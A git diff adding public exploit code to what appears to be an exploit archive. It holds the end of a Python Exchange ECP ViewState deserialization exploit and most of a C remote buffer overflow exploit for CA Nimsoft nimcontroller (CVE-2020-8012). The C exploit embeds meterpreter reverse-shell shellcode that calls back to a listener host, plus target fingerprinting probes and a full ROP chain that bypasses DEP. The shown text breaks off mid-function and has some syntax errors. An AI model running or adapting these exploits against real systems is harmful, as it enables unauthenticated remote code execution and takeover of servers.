+        ctx.verify_mode = ssl.CERT_NONE
+        oCookjar = cookielib.CookieJar()
+        #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})
+        #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)
+        oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))
+        sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)
+        ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')
+        if ans.lower() == 'n': exit(0)
+        sPayLoad = getYsoserialPayload(args.command, sSessionId)
+        print('[+] Got Payload: ' + sPayLoad)
+        sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)
+        print('      Sending now ...')
+        try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))
+        except urllib2.HTTPError, e:
+            if e.code == '500': print('[+] This probably worked (Error Code 500 received)')
+
+if __name__ == "__main__":
+	main()
\ No newline at end of file
diff --git a/exploits/windows/remote/48156.c b/exploits/windows/remote/48156.c
new file mode 100644
index 000000000..80174033f
--- /dev/null
+++ b/exploits/windows/remote/48156.c
@@ -0,0 +1,858 @@
+# Exploit Title: CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
+# Exploit Author: wetw0rk
+# Exploit Version: Public POC
+# Vendor Homepage: https://docops.ca.com/ca-unified-infrastructure-management/9-0-2/en
+# Software Version : 7.80
+# Tested on: Windows 10 Pro (x64), Windows Server 2012 R2 Standard (x64)
+# CVE: CVE-2020-8012   
+
+/************************************************************************************************************************** 
+ *                                                                                                                        *
+ * Description:                                                                                                           *
+ *                                                                                                                        *
+ *    Unauthenticated Nimbus nimcontroller RCE, tested against build 7.80.3132 although multiple versions are affected.   *
+ *    The exploit won't crash the service.                                                                                *
+ *                                                                                                                        *
+ *    You may have to run the exploit code multiple times on Windows Server 2012. If you exploit Windows Server 2019 it   *
+ *    should work as well just didn't get a chance to test it (reversing other things), I put faith in my ROP chain being *
+ *    universal (worked first try on 2012).                                                                               *
+ *                                                                                                                        *
+ * Note:                                                                                                                  *
+ *                                                                                                                        *
+ *     This is what it looks like, a fully remote stack based userland x64 exploit (NOT WOW64) and YES this did bypass    *
+ *     the stack cookie. WE OUT HERE!!!                                                                                   *
+ *                                                                                                                        *
+ * Compile:                                                                                                               *
+ *                                                                                                                        *
+ *    gcc poc_release.c -o singAboutMeImDyingOfThirst                                                                     *
+ *                                                                                                                        *
+ * Shoutout:                                                                                                              *
+ *                                                                                                                        *
+ *    Xx25, SneakyNachos, liquidsky, Itzik, r4g1n-cajun, FR13NDZ, Geluchat, ihack4falafel, cheshire_jack, the NSA         *
+ *    for dropping Ghidra, and my Mentor                                                                                  *
+ *                                                                                                                        *
+ * ----------------------------------------------- ReSpoNsIb1E Di$C10sUrE ----------------------------------------------- *
+ * 11/07/19 - Vendor contacted (POC code and POC video sent)                                                              *
+ * 11/15/19 - Vendor contacted for update, engineering team unable to reproduce bug                                       *
+ * 11/20/19 - Vendor cannot reproduce bug, call for a demo scheduled                                                      *
+ * 11/22/19 - Vendor rescheduled to Dec 3rd, claims (<ROAST REDACTED>...)                                                 *
+ * 12/03/19 - Vendor confirms exploitability and vulnerability presence                                                   *
+ * 12/13/19 - Vendor finalizing hotfix                                                                                    *
+ * 12/19/19 - Vendor hotfix tested against POC code                                                                       *
+ * 01/07/20 - Vendor contacted for update on patch and case status, followed up on 01/14/20                               *
+ * 01/21/20 - Vendor replies (awaiting more info)                                                                         *
+ * 01/27/20 - Vendor requests exploit code to release in late February to allow customers time to patch                   *
+ * 02/XX/20 - PoC sample dropped                                                                                          *
+ **************************************************************************************************************************/
+
+#include <stdio.h>
+#include <stdint.h>
+#include <ctype.h>
+#include <stdlib.h>
+#include <string.h>
+#include <getopt.h>
+#include <unistd.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+/* msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.157 LPORT=42 -f c */
+unsigned char shellcode[] = \
+"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
+"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
+"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
+"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
+"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
+"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
+"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
+"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
+"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
+"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
+"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
+"\x49\xbc\x02\x00\x00\x2a\xc0\xa8\x9f\x9d\x41\x54\x49\x89\xe4"
+"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
+"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
+"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
+"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
+"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
+"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
+"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
+"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
+"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
+"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
+"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
+"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
+"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
+"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
+"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
+"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
+"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
+
+const char *exploited[] = \
+{
+  "10.0.18362",
+  "6.3.9600",
+};
+
+const char *versions[]= \
+{
+  "7.80 [Build 7.80.3132, Jun  1 2015]",
+};
+
+/********************************************************************************************************************
+ *                                                                                                                  *
+ * NimsoftProbe:                                                                                                    *
+ *                                                                                                                  *
+ *    This is the structure used for the packet generator, it will be used specifically as the return type. Within  *
+ *    the structure there are 2 members, first the pointer to the packet and secondly the packet length.            *
+ *                                                                                                                  *
+ * NimsoftProbe *packet_gen(char *lparams[], int nparams, int exploit_buffer):                                      *
+ *                                                                                                                  *
+ *    This function will generate a nimbus probe, taken from nimpack (tool I developed while reverse engineering) a *
+ *    few modifications where made to handle the exploit buffer (mainly since it contains NULLS).                   *
+ *                                                                                                                  *
+ ********************************************************************************************************************/
+
+#define PHLEN 300   /* header      */
+#define PBLEN 2000  /* body        */
+#define PALEN 10000 /* argv        */
+#define FPLEN 20000 /* final probe */
+
+#define CLIENT "127.0.0.1/1337"
+
+#define INTSIZ(x) snprintf(NULL, 0, "%i", x)
+
+unsigned char packet_header[] = \
+"\x6e\x69\x6d\x62\x75\x73\x2f\x31\x2e\x30\x20%d\x20%d\x0d\x0a";
+unsigned char packet_body[] = \
+                                    /* nimbus header */
+"\x6d\x74\x79\x70\x65\x0F"          /* mtype         */
+"\x37\x0F\x34\x0F\x31\x30\x30\x0F"  /* 7.4.100       */
+"\x63\x6d\x64\x0F"                  /* cmd           */
+"\x37\x0F%d\x0F"                    /* 7.x           */
+"%s\x0F"                            /* probe         */
+"\x73\x65\x71\x0F"                  /* seq           */
+"\x31\x0F\x32\x0F\x30\x0F"          /* 1.2.0         */
+"\x74\x73\x0F"                      /* ts            */
+"\x31\x0F%d\x0F"                    /* 1.X           */
+"%d\x0F"                            /* UNIX EPOCH    */
+"\x66\x72\x6d\x0F"                  /* frm           */
+"\x37\x0F%d\x0F"                    /* 7.15          */
+"%s\x0F"                            /* client addr   */
+"\x74\x6f\x75\x74\x0F"              /* tout          */
+"\x31\x0F\x34\x0F\x31\x38\x30\x0F"  /* 1.4.180       */
+"\x61\x64\x64\x72\x0F"              /* addr          */
+"\x37\x0F\x30\x0F";                 /* 7.0           */
+
+typedef struct {
+  char *packet;
+  int length;
+} NimsoftProbe;
+
+NimsoftProbe *packet_gen(char *lparams[], int nparams, int exploit_buffer)
+{
+  int index = 0;
+  int fmt_args;
+  int lbody = 0;
+  int largs = 0;
+  char *tptr;
+  char pheader[PHLEN];
+  char pbody[PBLEN];
+  char pargs[PALEN];
+  char pbuffer[FPLEN];
+  char temp_buffer[80];
+  char *probe = lparams[0];
+
+  int epoch_time = (int)time(NULL);
+
+  NimsoftProbe *probePtr = (NimsoftProbe*)malloc(sizeof(NimsoftProbe));
+
+  fmt_args = snprintf(NULL, 0, "%d%s%d%d%d%s",
+    (strlen(probe)+1),
+    probe,
+    (INTSIZ(epoch_time)+1),
+    epoch_time,
+    (strlen(CLIENT)+1),
+    CLIENT
+  );
+
+  if ((fmt_args + sizeof(packet_body)) > PBLEN) {
+    printf("Failed to generate packet body\n");
+    exit(-1);
+  }
+
+  lbody = snprintf(pbody, PBLEN, packet_body,
+    (strlen(probe)+1),
+    probe,
+    (INTSIZ(epoch_time)+1),
+    epoch_time,
+    (strlen(CLIENT)+1),
+    CLIENT
+  );
+
+  for (i = 1; i < nparams; i++)
+  {
+    memset(temp_buffer, '\0', 80);
+
+    for (j = 0; j < strlen(lparams[i]); j++)
+    {
+      if ((c = lparams[i][j]) == '=')
+      {
+        memcpy(temp_buffer, lparams[i], j);
+        index = ++j;
+        break;
+      }
+    }
+
+    tptr = lparams[i];
+
+    if ((c = 1, c += strlen(temp_buffer)) < PALEN) {
+      largs += snprintf(pargs+largs, c, "%s", temp_buffer);
+      largs++;
+    } else {
+      printf("Failed to generate packet arguments\n");
+      exit(-1);
+    }
+
+    if (index > 0 && exploit_buffer == 0)
+    {
+      tptr = tptr+index;
+
+      if ((largs + strlen(tptr) + 2) < PALEN)
+      {
+        largs += snprintf(pargs+largs, 2, "%s", "1");
+        largs++;
+
+        largs += snprintf(pargs+largs, strlen(tptr)+1, "%d", strlen(tptr)+1);
+        largs++;
+      } else {
+        printf("Failed to generate packet arguments\n");
+        exit(-1);
+      }
+
+      c = 1, c += strlen(tptr);
+      if ((largs + c) < PALEN)
+      {
+        largs += snprintf(pargs+largs, c, "%s", tptr);
+        largs++;
+      } else {
+        printf("Failed to generate packet arguments\n");
+        exit(-1);
+      }
+    }
+
+    if (index > 0 && exploit_buffer > 0)
+    {
+      tptr = tptr+index;
+
+      if ((largs + exploit_buffer + 2) < PALEN)
+      {
+        largs += snprintf(pargs+largs, 2, "%s", "1");
+        largs++;
+
+        largs += snprintf(pargs+largs, 5, %d", exploit_buffer+1);
+        largs++;
+      } else {
+        printf("Failed to generate packet arguments\n");
+        exit(-1);
+      }
+
+      c = 1, c += exploit_buffer;
+
+      if ((largs + c) < PALEN)
+      {
+        memcpy(pargs+largs, tptr, c);
+        largs += exploit_buffer;
+        largs++;
+      } else {
+        printf("Failed to generate packet arguments\n");
+        exit(-1);
+      }
+    }
+  }
+
+  index = snprintf(pbuffer, FPLEN, packet_header, lbody, largs);
+  index += lbody;
+
+  if (index < FPLEN) {
+    strncat(pbuffer, pbody, lbody);
+  } else {
+    printf("Failed to concatenate packet body\n");
+    exit(-1);
+  }
+
+  for (i = 0; i < index; i++)
+    if (pbuffer[i] == '\x0f')
+      pbuffer[i] = '\x00';
+
+  if ((index + largs) < FPLEN) {
+    for (i = 0; i < largs; i++)
+      pbuffer[index++] = pargs[i];
+  }
+  else {
+    printf "Failed to concatenate packet arguments\n");
+    exit(-1);
+  }
+
+  probePtr->packet = pbuffer;
+  probePtr->length = index;
+
+  return probePtr;
+}
+
+/*********************************************************************************************************************
+ *                                                                                                                   *
+ * int parse_directory(char *response, int length):                                                                  *
+ *                                                                                                                   *
+ *    This function will parse the directory contents, specifically looking for the entry keyword;  if found, we can *
+ *    proceed with exploitation.                                                                                     *
+ *                                                                                                                   *
+ * int check_vulnerability(char *rhost, int rport):                                                                  *
+ *                                                                                                                   *
+ *    This function will send a Nimbus probe to the target controller, specifically the directory_list probe. Once   *
+ *    sent the returned packet will be parsed by parse_directory.                                                    *
+ *                                                                                                                   *
+ *********************************************************************************************************************/
+
+#define PE "(\033[1m\033[31m-\033[0m)"
+#define PI "(\033[1m\033[94m*\033[0m)"
+#define PG "(\033[1m\033[92m+\033[0m)"
+
+int parse_directory(char *response, int length)
+{
+  int i;
+  int backup;
+  int check = 0;
+  int index = 0;
+
+  char buf[80];
+  struct tm ts;
+  time_t capture;
+
+  if (strncmp(response, "nimbus/1.0", 10) != 0)
+    return -1;
+
+  while (index < length)
+  {
+    if (strcmp("entry", (response+index)) == 0)
+      printf("%s Persistence is an art\n\n", PG);
+
+    if (strcmp("name", (response+index)) == 0) {
+      backup = index;
+      check = 1;
+
+      /* last modified */
+      for (int i = 0; i < 15; i++)
+        index += strlen(response+index) + 1;
+      capture = atoi(response+index);
+      ts = *localtime(&capture);
+      strftime(buf, sizeof(buf), "%m/%d/%Y %I:%M %p", &ts);
+      printf("%12s ", buf);
+      index = backup;
+
+      /* type */
+      for (int i = 0; i < 7; i++)
+        index += strlen(response+index) + 1;
+      if (strcmp("2", (response+index)) == 0)
+        printf("%7s", " ");
+      else
+        printf("%-7s", "<DIR>");
+      index = backup;
+      /* name */
+      for (int i = 0; i < 3; i++)
+        index += strlen(response+index) + 1;
+      printf("%s\n", response+index);
+    }
+    index += strlen(response+index) + 1;
+  }
+
+  return (check != 1) ? -1 : 0;
+}
+
+int check_vulnerability(char *rhost, int rport)
+{
+  int c;
+  int sock;
+  int count;
+
+  NimsoftProbe *probe;
+  char response[BUFSIZ];
+  struct sockaddr_in srv;
+  char *get_directory_listing[] = { "directory_list", "directory=C:\\", "detail=1" };
+
+  probe = packet_gen(get_directory_listing, 3, 0);
+
+  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+    return -1;
+
+  srv.sin_addr.s_addr = inet_addr(rhost);
+  srv.sin_port = htons(rport);
+  srv.sin_family = AF_INET;
+
+  if (connect(sock , (struct sockaddr *)&srv, sizeof(srv)) < 0)
+    return -1;
+  printf("%s Verifying vulnerable probe is reachable\n", PI);
+
+  send(sock, probe->packet, probe->length, 0);
+  count = read(sock, response, BUFSIZ);
+
+  if (parse_directory(response, count) == 0)
+    printf("\n%s Target ready for exploitation\n", PG);
+  else
+    return -1;
+
+  free(probe);
+  close(sock);
+
+  return 0;
+}
+
+/********************************************************************************************************************
+ *                                                                                                                  *
+ * char *nimdex(char *haystack, char *needle, int size):                                                            *
+ *                                                                                                                  *
+ *    This function works similar to strstr, however it was specifically made to index "keys" to their respective   *
+ *    "values" within a Nimbus packet. It has only been tested against the get_info packet.                         *
+ *                                                                                                                  *
+ * int parse_response(char *response, int length):                                                                  *
+ *                                                                                                                  *
+ *    This function leverages nimdex to perform 2 checks. The first check will verify the target operating system   *
+ *    has been exploited, the second check will verify the Nimbus controller version is exploitable (or rather has  *
+ *    a ROP chain ready). In order for exploitation to succeed only the second check needs to pass, I have faith in *
+ *    my ROP chain being universal.                                                                                 *
+ *                                                                                                                  *
+ * int check_version(char *rhost, int rport):                                                                       *
+ *                                                                                                                  *
+ *    This function will send a Nimbus probe to the target controller, specifically the get_info probe. Once sent   *
+ *    the returned packet will be parsed by parse_response.                                                         *
+ *                                                                                                                  *
+ ********************************************************************************************************************/
+
+char *nimdex(char *haystack, char *needle, int size)
+{
+  int found = 0;
+  int index = 0;
+
+  if (strncmp(haystack, "nimbus/1.0", 10) != 0)
+    return NULL;
+
+  while (index < size)
+  {
+    if (strcmp(needle, (haystack+index)) == 0)
+      found = 2;
+    else if (found >= 2)
+      found++;
+    if (found == 5)
+      return &haystack[index];
+    index += strlen(haystack+index) + 1;
+  }
+  return NULL;
+}
+
+int parse_response(char *response, int length)
+{
+  int i;
+  int c;
+  char *ptr;
+  int check = 0;
+  int nv = sizeof(versions)/sizeof(versions[0]);
+  int ne = sizeof(exploited)/sizeof(exploited[0]);
+
+  if ((ptr = nimdex(response, "os_minor", length)) == NULL)
+    return -1;
+  printf("%s Probe successful, detected: %s\n", PI, ptr);
+
+  if ((ptr = nimdex(response, "os_version", length)) == NULL)
+    return -1;
+
+  for (i = 0; i < ne; i++)
+    if ((strcmp(exploited[i], ptr)) == 0)
+      check = 1;
+
+  if (check != 1)
+  {
+    printf("%s Exploit has not been tested against OS version\n", PE);
+    printf("%s Continute exploitation (Y/N): ", PE);
+
+    c = getchar();
+    if (tolower(c) != 'y')
+      exit(-1);
+
+    printf("%s If exploitation successful, update code!!!\n", PI);
+    if ((ptr = nimdex(response, "os_version", length)) == NULL)
+      return -1;
+    printf("%s Target OS ID: %s\n", PI, ptr);
+  }
+  else
+    printf("%s Target OS appears to be exploitable\n", PI);
+
+  check = 0;
+
+  if ((ptr = nimdex(response, "version", length)) == NULL)
+    return -1;
+
+  for (i = 0; i < nv; i++)
+    if ((strcmp(versions[i], ptr)) == 0)
+      check = 1;
+
+  if (check != 1) {
+    printf("%s Exploit has not been tested against target build\n", PE);
+    exit(-1);
+  } else
+    printf("%s Nimbus build appears to be exploitable\n", PI);
+
+  return 0;
+}
+
+int check_version(char *rhost, int rport)
+{
+  int c;
+  int sock;
+  int count;
+  NimsoftProbe *probe;
+  char response[BUFSIZ];
+  struct sockaddr_in srv;
+  char *get_operating_sys[] = { "get_info", "interfaces=0" };
+
+  probe = packet_gen(get_operating_sys, 2, 0);
+
+  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+    return -1;
+
+  srv.sin_addr.s_addr = inet_addr(rhost);
+  srv.sin_port = htons(rport);
+  srv.sin_family = AF_INET;
+
+  if (connect(sock , (struct sockaddr *)&srv, sizeof(srv)) < 0)
+    return -1;
+
+  printf("%s Sending get_info probe to %s:%d\n", PI, rhost, rport);
+
+  send(sock, probe->packet, probe->length, 0);
+  count = read(sock, response, BUFSIZ);
+
+  if ((parse_response(response, count) != 0)) {
+    printf("%s Probe failed, unable to parse packet\n", PE);
+    exit(-1);
+  }
+
+  free(probe);
+  close(sock);
+
+  return 0;
+}
+
+/*****************************************************************************************************************
+ * This chain will re-align RSP / Stack, it MUST be a multiple of 16 bytes otherwise our call will fail.         *
+ * I had VP work 50% of the time when the stack was unaligned.                                                   *
+ *****************************************************************************************************************/
+int64_t rsp_alignment_rop_gadgets[] = {
+
+[0 ... 19]    = 0x0000000140018c42, // ret (20 ROP NOPS)
+                0x0000000140002ef6, // pop rax ; ret
+                0x00000001401a3000, // *ptr to handle reference ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE )
+                0x00000001400af237, // pop rdi ; ret
+                0x0000000000000007, // alignment for rsp
+                0x0000000140025dab, // add esp, edi ; adc byte [rax], al ; add rsp, 0x0000000000000278 ; ret
+};
+
+/*****************************************************************************************************************
+ * This chain will craft function calls to GetModuleHandleA, GetProcAddressStub, and finally VirtualProtectStub. *
+ * Once completed, we have bypassed DEP and can get code execution. Since VirtualProtectStub is auto generated,  *
+ * we needn't worry about other Windows OS's.                                                                    *
+ *****************************************************************************************************************/
+int64_t dep_bypass_rop_gadgets[] = {
+
+// RAX -> HMODULE GetModuleHandleA(
+//  ( RCX == *module ) LPCSTR lpModuleName,
+// );
+[0 ... 14]    = 0x0000000140018c42, // ret (15 ROP NOPS)
+                0x0000000140002ef6, // pop rax ; ret
+                0x0000000000000000, // (zero out rax)
+                0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+[24 ... 33]   = 0x0000000140018c42, // ret (10 ROP NOPS)
+                0x0000000140131643, // pop rcx ; ret
+                0x00000000000009dd, // offset to "kernel32.dll"
+                0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
+[37 ... 51] =   0x0000000140018c42, // ret (15 ROP NOPS)
+                0x00000001400b741b, // xchg eax, ecx ; ret
+                0x0000000140002ef6, // pop rax ; ret
+                0x000000014015e310, // GetModuleHandleA (0x00000000014015E330-20)
+                0x00000001400d1161, // call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret
+[56 ... 72] =   0x0000000140018c42, // ret (17 ROP NOPS)
+
+// RAX -> FARPROC GetProcAddressStub(
+//   ( RCX == &addr    ) HMODULE hModule,
+//   ( RDX == *module  ) lpProcName
+// );
+                0x0000000140111c09, // xchg rax, r11 ; or al, 0x00 ; ret (backup &hModule)
+                0x0000000140002ef6, // pop rax ; ret
+                0x0000000000000000, // (zero out rax)
+                0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+[83 ... 92]   = 0x0000000140018c42, // ret (10 ROP NOPS)
+                0x0000000140131643, // pop rcx ; ret
+                0x0000000000000812, // offset to "virtualprotectstub"
+                0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
+[96 ... 110]  = 0x0000000140018c42, // ret (15 ROP NOPS)
+                0x0000000140135e39, // mov edx,eax ; mov rbx,qword [rsp+0x30] ; mov rbp,qword [rsp+0x38] ; mov rsi,qword [rsp+0x40] ; mov rdi,qword [rsp+0x48] ; mov eax,edx ; add rsp,0x20 ; pop r12; ret
+[112 ... 121] = 0x0000000140018c42, // ret (10 ROP NOPS)
+                0x00000001400d1ab8, // mov rax, r11 ; add rsp, 0x30 ; pop rdi ; ret
+[123 ... 132] = 0x0000000140018c42, // ret (10 ROP NOPS)
+                0x0000000140111ca1, // xchg rax, r13 ; or al, 0x00 ; ret
+                0x00000001400cf3d5, // mov rcx, r13 ; mov r13, qword [rsp+0x50] ; shr rsi, cl ; mov rax, rsi ; add rsp, 0x20 ; pop rdi ; pop rsi ; pop rbp ; ret
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+[138 ... 143] = 0x0000000140018c42, // ret
+                0x0000000140002ef6, // pop rax ; ret
+                0x000000014015e318, // GetProcAddressStub (0x00000000014015e338-20)
+                0x00000001400d1161, // call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret
+[147 ... 163] = 0x0000000140018c42, // ret (17 ROP NOPS)
+
+// RAX -> BOOL VirtualProtectStub(
+//   ( RCX == *shellcode          ) LPVOID  lpAddress,
+//   ( RDX == len(shellcode)      ) SIZE_T  dwSize,
+//   ( R8  == 0x0000000000000040  ) DWORD   flNewProtect,
+//   ( R9  == *writeable location ) PDWORD  lpflOldProtect,
+// );
+                0x0000000140111c09, // xchg rax, r11 ; or al, 0x00 ; ret (backup *VirtualProtectStub)
+                0x000000014013d651, // pop r12 ; ret
+                0x00000001401fb000, // *writeable location ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE )
+                0x00000001400eba74, // or r9, r12 ; mov rax, r9 ; mov rbx, qword [rsp+0x50] ; mov rbp, qword [rsp+0x58] ; add rsp, 0x20 ; pop r12 ; pop rdi ; pop rsi ; ret
+[168 ... 177] = 0x0000000140018c42, // ret (10 ROP NOPS)
+                0x0000000140002ef6, // pop rax ; ret
+                0x0000000000000000, //
+                0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+[187 ... 196] = 0x0000000140018c42, // ret (10 ROP NOPS)
+                0x0000000140131643, // pop rcx ; ret
+                0x000000000000059f, // (offset to *shellcode)
+                0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
+[200 ... 214] = 0x0000000140018c42, // ret (15 ROP NOPS)
+                0x00000001400b741b, // xchg eax, ecx ; ret
+                0x00000001400496a2, // pop rdx ; ret
+                0x00000000000005dc, // dwSize
+                0x00000001400bc39c, // pop r8 ; ret
+                0x0000000000000040, // flNewProtect
+                0x00000001400c5f8a, // mov rax, r11 ; add rsp, 0x38 ; ret (RESTORE VirtualProtectStub)
+[221 ... 237] = 0x0000000140018c42, // ret (17 ROP NOPS)
+                0x00000001400a0b55, // call rax ; mov rdp qword ptr [rsp+48h] ; mov rsi, qword ptr [rsp+50h] ; mov rax, rbx ; mov rbx, qword ptr [rsp + 40h] ; add rsp,30h ; pop rdi ; ret
+[239 ... 258] = 0x0000000140018c42, // ret (20 ROP NOPS)
+                0x0000000140002ef6, // pop rax ; ret (CALL COMPLETE, "JUMP" INTO OUR SHELLCODE)
+                0x0000000000000000, // (zero out rax)
+                0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+                0x0000000000000000, //
+[268 ... 277] = 0x0000000140018c42, // ret (10 ROP NOPS)
+                0x0000000140131643, // pop rcx ; ret
+                0x0000000000000317, // (offset to our shellcode)
+                0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
+[281 ... 295] = 0x0000000140018c42, // ret (15 ROP NOPS)
+                0x00000001400a9747, // jmp rax
+[297 ... 316] = 0x0000000140018c42, // ret (do not remove)
+};
+
+/********************************************************************************************************************
+ *                                                                                                                  *
+ * int generate_rop_chain(unsigned char *buffer, int gadgets, int64_t rop_gadgets[]):                               *
+ *                                                                                                                  *
+ *    This function will generate a rop chain and store it in the buffer passed as the first argument. The return   *
+ *    value will contain the final ROP chain size.                                                                  *
+ *                                                                                                                  *
+ ********************************************************************************************************************/
+
+#define RSP_ROP (sizeof(rsp_alignment_rop_gadgets)/sizeof(int64_t))
+#define DEP_ROP (sizeof(dep_bypass_rop_gadgets) / sizeof(int64_t))
+
+int generate_rop_chain(unsigned char *buffer, int gadgets, int64_t rop_gadgets[])
+{
+  int i, j, k;
+  int chain_size = 0;
+
+  for (i = 0; i < gadgets; i++)
+    for (j = 0, k = 0; j < sizeof(rop_gadgets[i]); j++)
+    {
+      *buffer++ = ((rop_gadgets[i]>>k)&0xff);
+      chain_size++;
+      k += 8;
+    }
+
+  return chain_size;
+}
+
+#define MAX_EXPLOIT_BUFFER 9000
+
+unsigned char *generate_exploit_buffer(unsigned char *buffer)
+{
+  int r1, r2, c;
+  char rop_chain[20000];
+  unsigned char *heapflip = "\x3d\xfd\x06\x40\x01\x00\x00\x00";
+
+  memset(buffer     , 0x41, 1000);  // Offset
+  memset(buffer+1000, 0x0F, 33);
+  memcpy(buffer+1033, heapflip, 8); // HeapFlip - pop rsp ; or al, 0x00 ; add rsp, 0x0000000000000448 ; ret
+  memset(buffer+1041, 0x41, 7);     // Adjustment for the initial chain
+
+  /* generate the first rop chain to perform stack alignment */
+  r1 = generate_rop_chain(rop_chain, RSP_ROP, rsp_alignment_rop_gadgets);
+  memcpy(buffer+1048, rop_chain, r1);
+  c = r1 + 1048;
+
+  /* adjust for second stage */
+  memset(buffer+c, 0x57, 631);
+  c += 631;
+
+  /* generate the second rop chain to perform DEP bypass */
+  r2 = generate_rop_chain(rop_chain, DEP_ROP, dep_bypass_rop_gadgets);
+  memcpy(buffer+c, rop_chain, r2);
+  c += r2;
+
+  /* ROP CHAIN MUST BE 3500 BYTES OR EXPLOITATION WILL FAIL */
+  memset(buffer+c, 0x45, (3500 - (r1 + r2 + 631)));
+  c += (3500 - (r1 + r2 + 631));
+
+  memcpy(buffer+c, "kernel32.dll\x00", 13);
+  c += 13;
+
